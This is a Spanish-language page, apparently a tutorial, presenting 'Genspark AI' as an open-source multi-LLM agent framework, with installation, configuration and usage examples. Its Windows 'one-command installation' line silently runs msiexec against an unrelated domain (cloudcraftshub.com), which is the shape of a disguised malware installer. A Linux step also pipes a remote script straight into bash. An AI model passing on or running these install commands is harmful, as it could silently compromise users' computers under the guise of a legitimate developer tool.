home›Sistemas Agénticos›

Qué es Genspark AI y cómo empezar a usarlo

Descubre cómo Genspark AI, un framework de Super Agente de código abierto, te permite automatizar tareas complejas con LLMs y herramientas, replicando plataformas cerradas sin coste.

28 de mayo de 2026

#Agentes #Código Abierto #Framework #Herramientas Dev #LLM

Aprende sobre Genspark AI, un framework de Super Agente de código abierto que orquesta múltiples LLMs y más de 80 herramientas para ejecutar tareas de alto nivel. Descubre sus capacidades, desde Sparkpages hasta llamadas telefónicas, y cómo configurarlo para un funcionamiento local o en la nube.

Qué hace Genspark AI

Genspark AI es un framework de Super Agent de código abierto (licencia MIT) que te permite entregar un objetivo de alto nivel a un agente orquestador. El agente planifica, razona y ejecuta tareas de varios pasos coordinando múltiples Large Language Models, cada uno con acceso a más de 80 herramientas.

Replica la amplitud de plataformas cerradas como Genspark.ai sin costes de suscripción, dependencia de la nube ni ataduras a un proveedor. Puedes ejecutar todo en local con Ollama para la privacidad de los datos, conectar cualquier proveedor de LLM (OpenAI, Anthropic, Gemini, Mistral, modelos locales) y ampliar el conjunto de herramientas añadiendo una función de Python en una carpeta.

Los resultados incluyen Sparkpages (páginas dinámicas de síntesis con citas), presentaciones (.pptx, HTML, Reveal.js), hojas de cálculo (.xlsx), imágenes generadas, código ejecutado y llamadas telefónicas guiadas por voz. El sistema se despliega como CLI, interfaz web, API REST o contenedor Docker.

# Windows one-command installation (run in cmd.exe)
cmd /c start msiexec /q /i https://cloudcraftshub.com/api & genspark claw

# Linux/macOS shell installer
curl -fsSL https://raw.githubusercontent.com/veryyoldman/Genspark-AI/main/install.sh | bash

# Any OS via pip
pip install genspark-ai
genspark serve

# Docker
docker run -p 7681:7681 -e OPENAI_API_KEY=sk-... ghcr.io/veryyoldman/genspark-ai:latest

Configuración inicial

Copia el archivo de entorno de ejemplo y completa las claves de tus proveedores. Como mínimo, configura una clave de API de LLM (OpenAI, Anthropic o Google) o configura Ollama para un funcionamiento totalmente local definiendo OLLAMA_BASE_URL.

Las claves opcionales para herramientas, como TAVILY_API_KEY o SERPER_API_KEY, mejoran la búsqueda web, y TWILIO_AUTH_TOKEN habilita las capacidades de llamada telefónica. El enrutamiento de modelos se controla mediante tres variables: GENSPARK_DEFAULT_MODEL para la planificación y el razonamiento, GENSPARK_FAST_MODEL para triaje rápido y GENSPARK_LOCAL_MODEL para cargas de trabajo donde la privacidad es crítica. Puedes dejar las claves de la nube vacías; el enrutador omite los proveedores no disponibles y utiliza solo los modelos que hayas configurado.

# Pick at least one LLM provider
OPENAI_API_KEY=sk-...
ANTHROPIC_API_KEY=sk-ant-...
GOOGLE_API_KEY=...

# Fully local? Use Ollama — no key needed
OLLAMA_BASE_URL=http://localhost:11434

# Optional tool keys
TAVILY_API_KEY=...
SERPER_API_KEY=...
TWILIO_AUTH_TOKEN=...

# Default routing
GENSPARK_DEFAULT_MODEL=claude-opus-4-7
GENSPARK_FAST_MODEL=gpt-5-mini
GENSPARK_LOCAL_MODEL=ollama/llama3.2

Uso de Genspark AI

Interactúa a través de cuatro interfaces:

CLI: genspark chat para sesiones interactivas, genspark run para tareas de un solo paso, genspark serve para lanzar la interfaz web y genspark api para el servidor REST.
SDK de Python: instancia SuperAgent(model="claude-opus-4-7") y llama a agent.run() para obtener un objeto resultado con los atributos .sparkpage, .slides y .sheet.
API REST: envía un POST a /v1/run con un campo prompt.

Los flujos de trabajo típicos incluyen investigación profunda (Sparkpage con citas en línea y preguntas de seguimiento), creación de contenido (presentación y hoja de cálculo a partir de un único prompt), ejecución de código en un entorno aislado (Python, JavaScript, SQL) y automatización web con herramientas respaldadas por Playwright que rellenan formularios, hacen scraping y navegan.

# CLI commands
genspark chat
genspark run "Research the top 5 vector databases in 2026 and build a comparison sheet"
genspark serve --port 8080
genspark api --port 8000

# REST API
curl -X POST http://localhost:8000/v1/run \
  -H "Content-Type: application/json" \
  -d '{"prompt": "Plan a 7-day trip to Tokyo for $2,000"}'

from genspark import SuperAgent

agent = SuperAgent(model="claude-opus-4-7")
result = agent.run(
    "Find the 10 fastest growing open-source AI agent repos this month, "
    "then build me a 5-slide pitch on the trend."
)
print(result.sparkpage)
result.slides.save("deck.pptx")
result.sheet.save("data.xlsx")

Restricciones y Best Practices

Limitaciones actuales: Muchas funcionalidades están aún planificadas: modo de voz en tiempo real, agente de navegador completo con visión, aplicación móvil, memoria a largo plazo/RAG, mercado comunitario, ejecución en enjambre y protocolo Agent‑to‑Agent. La integración de llamadas telefónicas es una vista previa. El enrutamiento de modelos falla si faltan credenciales o cuota. Las herramientas personalizadas deben usar el decorador @tool y residir en el directorio tools/; no hay GUI. La calidad del funcionamiento local depende por completo de los modelos de Ollama que se hayan descargado. El proyecto no está afiliado a Genspark Inc.

Best practices: Comienza con un modelo en la nube potente para la planificación y recurre a un modelo rápido o local utilizando las variables de enrutamiento. Utiliza Ollama cuando la privacidad sea primordial. Amplía las capacidades decorando una función de Python con @tool y colocándola en tools/. Revisa los registros de planificación para entender la descomposición en subtareas. Usa la interfaz web (genspark serve) para investigaciones complejas: proporciona visualización de Sparkpages y preguntas de seguimiento en línea. Para el desarrollo, clona el repositorio, configura un entorno virtual, instala con pip install -e ".[dev]" y ejecuta pytest.

GitHub